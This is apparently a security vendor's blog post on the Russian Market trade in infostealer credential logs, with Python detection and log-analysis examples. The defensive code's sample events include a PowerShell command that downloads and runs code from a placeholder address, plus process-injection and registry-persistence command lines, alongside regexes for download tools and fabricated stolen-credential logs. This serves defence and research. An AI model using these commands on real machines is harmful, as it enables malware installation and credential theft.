Stolen credentials are the golden ticket for cybercriminals, and infostealer malware is the key that unlocks it all. The scale of the threat is staggering: In 2024, ReliaQuest’s GreyMatter Digital Risk Protection (GreyMatter DRP) service raised over 136,000 customer alerts related to potential stolen credentials on the notorious automated vending cart site Russian Market.

Russian Market has cemented itself as the Amazon of stolen credentials, dominating the cybercriminal ecosystem with its simplicity, convenience, and massive inventory. Despite criticism for selling duplicate logs and passing off public data as private, its streamlined one-click purchases and advanced filtering options make it the platform of choice for threat actors.

By 2023 the marketplace boasted over 5 million logs, each containing tens to hundreds of credentials, giving attackers an affordable and efficient way to compromise accounts, often for as little as $2 per log. While rivals like Telegram channels and newer marketplaces struggle to compete, Russian Market’s longevity and reliability keep it at the forefront, even amid concerns that law enforcement is targeting its operations.

No organization is safe from the Russian Market infostealer threat, although industries like professional services and information tend to be disproportionately impacted due to their high digital engagement and complex supply chains.

To better understand what’s fueling this lucrative underground economy, the ReliaQuest Threat Research team published a report investigating the tactics, tools, and trends driving Russian Market’s success—and why businesses must act now to protect themselves.

Download the Full Report >

In this blog, we’ll look at three themes from the report: cybercriminals’ infostealer choices, how the infostealers represented on Russian Market make their way onto machines in the first place, and the exclusivity of the stolen logs.

Figure 1: Russian Market "LOGS" page

The landscape of credential theft is shaped by the infostealers cybercriminals choose, as these tools determine the scope and effectiveness of their operations. By analyzing over 1.6 million posts on Russian Market since 2022, we uncovered the rise and fall of popular infostealers, driven by factors like technical innovation, law enforcement interventions, and distribution tactics.

“Lumma” (aka LummaC2) emerged as the dominant infostealer, accounting for nearly 92% of Russian Market credential log alerts in Q4 2024. Our analysis shows that cybercriminals favor advanced, commercial infostealer tools, which likely drove Lumma’s success. Its distribution through fake CAPTCHA pages, which trick the victim into pasting and running a command that fetches the stealer, likely further propelled its rise. Lumma’s infrastructure was disrupted by a law enforcement takedown in May 2025; “Acreed”, which had already surpassed many established stealers in Q1 2025, is the likely next big infostealer threat.

Figure 2: Percentage of Russian Market alerts attributed to different infostealers by quarter

Real-World Case Study: Rapid Containment of Lumma Malware

In January 2025, ReliaQuest responded to a critical alert indicating the presence of Lumma malware within a customer’s environment. The alert stemmed from a suspicious PowerShell command that downloaded Lumma. Following a thorough investigation, ReliaQuest implemented decisive containment measures, including host isolation, credential rotation, and blocking malicious domains and payloads. While the investigation confirmed Lumma was successfully executed, existing security controls prevented outbound connections to its command-and-control infrastructure, ensuring no data exfiltration occurred.

This incident underscores the importance of proactive monitoring and rapid response in mitigating credential theft risks. ReliaQuest’s GreyMatter DRP and Automated Response Playbooks were instrumental in limiting the impact of this attack, reducing the time to contain the threat from hours to minutes.

How Infostealers Compromise Machines: What the Logs Tell Us

Our analysis of Russian Market logs found that infostealers use a variety of sophisticated techniques to compromise machines and steal credentials.

  1. Abusing Writable Directories: Attackers use user-writable directories, like the Temp folder, as temporary working spaces for staging payloads before stealing or exfiltrating data.

  2. Obfuscation with Scripts and Archives: Techniques such as AutoIt scripts and compressed archives are used to disguise malware as legitimate software and slip past antivirus tools.

  3. Hidden Payloads: Infostealers often conceal payloads in less-monitored directories, such as "C:\Windows\Fonts\", or use legitimate tools like Mavinject32.exe to inject malicious code into running processes.

  4. Living-Off-the-Land (LotL) Techniques: Attackers leverage pre-installed system utilities like MSBuild.exe to execute malicious scripts, blending in with legitimate system processes.

  5. Persistence Mechanisms: Infostealers ensure their longevity by creating registry Run keys, scheduled tasks, or files in startup directories, allowing them to survive reboots and casual cleanup by the user.

Together, these five methods form a robust toolkit for attackers, emphasizing the importance of proactive defense strategies to mitigate these threats.
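The suspicious PowerShell download from the case study above and the five techniques just listed all leave process-creation telemetry behind. The Python below is an added example for this post, not ReliaQuest detection content: it runs a small rule set over constructed Sysmon-style process-creation events (image, parent image, command line). The field names, the sample events, the address 198.51.100.7 and the archive temp-folder prefixes (7-Zip's `7zO`, WinRAR's `Rar$`) are assumptions made for the example, not data taken from the report.

```python
"""Process-creation rules for the infostealer tradecraft described in the post.
Added example, not ReliaQuest content: the field names, sample events and
temp-folder conventions below are assumptions made for the example."""
import ntpath
import re

# Constructed Sysmon-style events (Event ID 1 fields) from one infected host.
EVENTS = [
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": "powershell -w hidden -ep bypass -c \"iex (New-Object "
                "Net.WebClient).DownloadString('http://198.51.100.7/x.txt')\""},
    {"image": r"C:\Users\alice\AppData\Local\Temp\setup\update.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": r"C:\Users\alice\AppData\Local\Temp\setup\update.exe"},
    {"image": r"C:\Users\alice\AppData\Local\Temp\7zO1\install.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": r'"C:\Users\alice\AppData\Local\Temp\7zO1\install.exe" main.a3x'},
    {"image": r"C:\Windows\System32\mavinject.exe",
     "parent": r"C:\Windows\Fonts\svc.exe",
     "cmdline": r"mavinject.exe 4412 /INJECTRUNNING C:\Windows\Fonts\core.dll"},
    {"image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     "parent": r"C:\Users\alice\AppData\Local\Temp\x.exe",
     "cmdline": r"MSBuild.exe C:\Users\alice\AppData\Local\Temp\build.xml"},
    {"image": r"C:\Windows\System32\reg.exe",
     "parent": r"C:\Users\alice\AppData\Local\Temp\x.exe",
     "cmdline": r"reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run "
                r"/v Updater /t REG_SZ /d C:\Users\alice\AppData\Roaming\upd.exe"},
    {"image": r"C:\Windows\System32\notepad.exe",            # benign control
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": "notepad.exe notes.txt"},
]

TEMP_DIR = re.compile(r"\\AppData\\Local\\Temp\\|\\Windows\\Temp\\", re.I)
# Folders 7-Zip (7zO...) and WinRAR (Rar$...) create when a file is opened
# straight out of an archive; assumed conventions for this example.
ARCHIVE_TMP = re.compile(r"\\Temp\\(7zO|Rar\$)", re.I)
FONTS_DIR = re.compile(r"\\Windows\\Fonts\\", re.I)
RUN_KEY = re.compile(r"\\CurrentVersion\\Run(Once)?\b", re.I)
AUTOIT_SCRIPT = re.compile(r"\.a3x\b", re.I)
DOWNLOAD_CRADLE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|\bcurl\b|\bwget\b", re.I)
ENCODED_CMD = re.compile(r"(^|\s)-(e|ec|enc|encodedcommand)\s", re.I)


def _base(path):
    return ntpath.basename(path).lower()


def evaluate(ev):
    """Return the names of the rules one event matches ([] for benign)."""
    image, parent, cmd = ev["image"], ev["parent"], ev["cmdline"]
    img, par = _base(image), _base(parent)
    hits = []
    # Case study: PowerShell fetching a payload (download cradle or encoded command).
    if img in ("powershell.exe", "pwsh.exe") and (
            DOWNLOAD_CRADLE.search(cmd) or ENCODED_CMD.search(cmd)):
        hits.append("powershell_download_cradle")
    # 1. Execution out of a user-writable temp directory.
    if TEMP_DIR.search(image):
        hits.append("exec_from_writable_temp")
    # 2. AutoIt script arguments, or a binary run straight out of an archive.
    if AUTOIT_SCRIPT.search(cmd) or img == "autoit3.exe" or ARCHIVE_TMP.search(image):
        hits.append("autoit_or_archive_staging")
    # 3. Payloads hidden under C:\Windows\Fonts, or mavinject used for injection.
    if any(FONTS_DIR.search(p) for p in (image, parent, cmd)):
        hits.append("payload_in_fonts_dir")
    if img.startswith("mavinject") and "/injectrunning" in cmd.lower():
        hits.append("mavinject_process_injection")
    # 4. MSBuild launched by anything other than Visual Studio (devenv.exe).
    if img == "msbuild.exe" and par != "devenv.exe":
        hits.append("msbuild_lotl_execution")
    # 5. Persistence via a Run/RunOnce registry key.
    if img == "reg.exe" and RUN_KEY.search(cmd) and re.search(r"\badd\b", cmd, re.I):
        hits.append("run_key_persistence")
    return hits


def scan(events):
    """Map event index -> matched rules, for every event that fires at least one."""
    result = {}
    for i, ev in enumerate(events):
        hits = evaluate(ev)
        if hits:
            result[i] = hits
    return result


if __name__ == "__main__":
    for i, hits in scan(EVENTS).items():
        print(i, _base(EVENTS[i]["image"]), "->", ", ".join(hits))
```

The rules are deliberately narrow so that each one maps to a single technique from the list; in production you would tune them against your own baseline (build servers legitimately run MSBuild, installers legitimately run from Temp) and score the combination, since a single host matching several of these within minutes is the strong signal.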

ReliaQuest Reviews: How Does Russian Market Measure Up?

Russian Market’s popularity among cybercriminals stems from its vast inventory of stolen credentials, but our analysis of over 300 malware logs containing tens of thousands of stolen passwords revealed a significant portion of its offerings are recycled rather than unique. This recycling often results from cybercriminals uploading the same logs across multiple platforms, including Telegram channels and other forums, or reselling logs purchased from Russian Market elsewhere. While this casts doubt on the platform’s inventory quality, it doesn’t necessarily suggest deliberate deception by Russian Market itself.

Figure 3: Post by cybercriminal forum user SGL claiming Russian Market is full of public logs

Another issue is that some sellers inflate their listings with fake credentials, such as generic email addresses like “example[at]gmail[.]com,” exploiting the high demand for domains like Gmail. Buyers see only the domain name before purchase, uncovering the deception only after the transaction is complete. This practice reflects the immense value of Gmail accounts in the cybercriminal ecosystem, as they often serve as gateways to multiple connected services, including financial platforms, entertainment subscriptions, and online shopping accounts.

Russian Market lacks a system for rating or reviewing sellers, unlike cybercriminal forums where buyers can publicly expose scammers. This absence of accountability weakens trust among buyers over time, but the steady influx of new buyers allows dishonest sellers to continue operating with minimal consequences, confident that the potential rewards outweigh the risks.
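The two quality problems just described, recycled logs and listings padded with placeholder accounts, can both be measured from the log files themselves. The Python below is an added example for this post, not ReliaQuest tooling: it parses three constructed logs in the URL/USER/PASS layout that many stealer "passwords" files use (an assumed format), fingerprints each canonicalised credential with SHA-256 so plaintext is not kept around during comparison, reports what fraction of each log also appears in some other log, and flags usernames whose local part is a generic placeholder (an assumed list).

```python
"""Measure how much of a batch of stealer logs is recycled, and flag placeholder
accounts. Added example for this post, not ReliaQuest tooling: the logs are
constructed and the URL/USER/PASS layout is an assumed common stealer format."""
import hashlib
from itertools import combinations
from urllib.parse import urlsplit

# Constructed logs. B repeats two of A's credentials; C is padded with placeholders.
LOGS = {
    "log_A.txt": """URL: https://accounts.google.com/signin/v2
USER: Alice.W@gmail.com
PASS: Winter2024!
===============
URL: https://www.paypal.com/signin
USER: alice.w@gmail.com
PASS: Winter2024!
===============
URL: https://www.netflix.com/login
USER: alice.w@gmail.com
PASS: popcorn99
""",
    "log_B.txt": """URL: https://www.paypal.com/signin?country=US
USER: alice.w@gmail.com
PASS: Winter2024!
===============
URL: https://accounts.google.com/ServiceLogin
USER: alice.w@gmail.com
PASS: Winter2024!
===============
URL: https://www.amazon.com/ap/signin
USER: alice.w@gmail.com
PASS: primeTime7
""",
    "log_C.txt": """URL: https://accounts.google.com/signin
USER: example@gmail.com
PASS: password
===============
URL: https://www.facebook.com/login
USER: test@gmail.com
PASS: 123456
""",
}

# Local parts sellers use to pad listings; an assumed list for the example.
PLACEHOLDER_LOCAL_PARTS = {"example", "test", "user", "sample", "email"}


def parse_log(text):
    """Return (host, user, password) triples from a URL/USER/PASS formatted log."""
    record, triples = {}, []
    for line in text.splitlines():
        key, _, value = line.partition(":")
        key = key.strip().upper()
        if key in ("URL", "USER", "PASS"):
            record[key] = value.strip()
        if len(record) == 3:
            # Canonicalise: host only (path and query vary between logs), user lowercased.
            host = urlsplit(record["URL"]).hostname or record["URL"]
            triples.append((host.lower(), record["USER"].lower(), record["PASS"]))
            record = {}
    return triples


def fingerprint(triple):
    """Hash the canonical triple so comparisons never keep plaintext around."""
    return hashlib.sha256("\x00".join(triple).encode()).hexdigest()


def _fingerprints(logs):
    return {name: {fingerprint(t) for t in parse_log(text)} for name, text in logs.items()}


def recycled_ratio(logs):
    """Fraction of each log's credentials that also appear in some other log."""
    prints = _fingerprints(logs)
    ratios = {}
    for name, fps in prints.items():
        others = set().union(*(v for k, v in prints.items() if k != name))
        ratios[name] = len(fps & others) / len(fps) if fps else 0.0
    return ratios


def pairwise_jaccard(logs):
    """Jaccard similarity of every pair of logs; 1.0 means an identical credential set."""
    prints = _fingerprints(logs)
    return {(a, b): len(prints[a] & prints[b]) / len(prints[a] | prints[b])
            for a, b in combinations(sorted(prints), 2)}


def placeholder_accounts(text):
    """Credentials whose username is a generic placeholder like example@gmail.com."""
    return [t for t in parse_log(text)
            if t[1].partition("@")[0] in PLACEHOLDER_LOCAL_PARTS]


if __name__ == "__main__":
    print(recycled_ratio(LOGS))
    print(pairwise_jaccard(LOGS))
    for name, text in LOGS.items():
        print(name, "placeholders:", placeholder_accounts(text))
```

Two caveats a practitioner would add: the unsalted SHA-256 fingerprints are still derived from passwords and must be handled as sensitive data, and canonicalising on hostname alone will merge distinct accounts on the same site only if user and password also match, which is the intended notion of "same credential" here.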

Countering the Infostealer Threat

It’s far more effective to address infostealer activity at its root—when infostealers are infiltrating your environment—than waiting for the consequences of credential abuse to play out. By stopping infostealers early, organizations can significantly reduce the downstream risks associated with stolen credentials. To tackle the infostealer threat head-on, consider these defensive steps.

  • Enforce browser management policies, for example via Group Policy Objects (GPOs), that disable built-in browser password managers, as infostealers routinely harvest the credentials browsers store on disk.

  • Reduce session lifetimes so that users reauthenticate more often. A stolen session cookie lets an attacker skip the password and any MFA prompt entirely, so a shorter lifetime shrinks the window in which a harvested cookie is still usable.

  • Deploy monitoring solutions to detect signs of infostealer-linked credential abuse, such as geographically anomalous logins, repeated login failures, or logins from unfamiliar devices.
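The third bullet's signals can be expressed as simple rules over sign-in events. The Python below is an added example for this post, not ReliaQuest detection content: it runs impossible-travel, unfamiliar-device and repeated-failure checks over constructed sign-in events. The events use TEST-NET addresses and already carry coordinates and a per-user device baseline (in practice an IP geolocation lookup and your identity provider's device registry would supply these); the 900 km/h threshold and the 5-failures-in-10-minutes window are assumed tuning values.

```python
"""Identity-layer signals of infostealer credential abuse: impossible travel,
unfamiliar device, repeated failures. Added example for this post, not
ReliaQuest detection content. Events are constructed and already carry
coordinates; an IP geolocation lookup would supply them in practice."""
from datetime import datetime, timedelta
from math import asin, cos, radians, sin, sqrt

MAX_PLAUSIBLE_KMH = 900            # faster than an airliner counts as impossible
FAIL_THRESHOLD = 5
FAIL_WINDOW = timedelta(minutes=10)
KNOWN_DEVICES = {"alice": {"dev-a1"}, "bob": {"dev-b1"}}   # assumed device baseline

# Constructed sign-in events (TEST-NET addresses); coordinates pre-resolved.
EVENTS = [
    {"user": "alice", "ts": "2025-01-15T09:00:00", "ip": "192.0.2.10",
     "lat": 51.5074, "lon": -0.1278, "device": "dev-a1", "ok": True},    # London
    {"user": "alice", "ts": "2025-01-15T09:40:00", "ip": "203.0.113.9",
     "lat": -23.5505, "lon": -46.6333, "device": "dev-x7", "ok": True},  # Sao Paulo
] + [
    {"user": "bob", "ts": f"2025-01-15T10:0{i}:00", "ip": "198.51.100.4",
     "lat": 52.52, "lon": 13.405, "device": "dev-b1", "ok": False}        # Berlin
    for i in range(5)
] + [
    {"user": "bob", "ts": "2025-01-15T10:05:00", "ip": "198.51.100.4",
     "lat": 52.52, "lon": 13.405, "device": "dev-b1", "ok": True},
]


def haversine_km(lat1, lon1, lat2, lon2):
    """Great-circle distance in kilometres between two coordinates."""
    p1, p2 = radians(lat1), radians(lat2)
    dphi, dlmb = radians(lat2 - lat1), radians(lon2 - lon1)
    a = sin(dphi / 2) ** 2 + cos(p1) * cos(p2) * sin(dlmb / 2) ** 2
    return 2 * 6371.0 * asin(sqrt(a))


def detect(events):
    """Return (user, signal, detail) tuples in chronological order."""
    alerts, last_ok, fails = [], {}, {}
    for ev in sorted(events, key=lambda e: e["ts"]):
        user, ts = ev["user"], datetime.fromisoformat(ev["ts"])
        if not ev["ok"]:
            # Sliding window of recent failures; one alert per burst.
            window = [t for t in fails.get(user, []) if ts - t < FAIL_WINDOW] + [ts]
            if len(window) >= FAIL_THRESHOLD:
                alerts.append((user, "repeated_failures", len(window)))
                window = []
            fails[user] = window
            continue
        if ev["device"] not in KNOWN_DEVICES.get(user, set()):
            alerts.append((user, "unfamiliar_device", ev["device"]))
        prev = last_ok.get(user)
        if prev is not None:
            km = haversine_km(prev["lat"], prev["lon"], ev["lat"], ev["lon"])
            hours = (ts - datetime.fromisoformat(prev["ts"])).total_seconds() / 3600
            speed = km / hours if hours > 0 else (float("inf") if km > 0 else 0.0)
            if speed > MAX_PLAUSIBLE_KMH:
                alerts.append((user, "impossible_travel", round(speed)))
        last_ok[user] = ev
    return alerts


if __name__ == "__main__":
    for alert in detect(EVENTS):
        print(*alert)
```

Note that the impossible-travel check compares only successful sign-ins, because a stolen cookie or password is used to succeed, not to fail; VPN egress and mobile carrier geolocation produce false positives here, so in practice the unfamiliar-device signal is the one worth weighting most heavily.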

ReliaQuest has developed specific detections and GreyMatter Automated Response Playbooks designed to target infostealer activity at multiple stages of the attack lifecycle. The detections focus on identifying suspicious behavior associated with credential theft, while the Automated Response Playbooks enable rapid responses to mitigate risks. By combining the detections with the Playbooks, organizations can reduce their mean time to contain (MTTC) threats from hours to just minutes.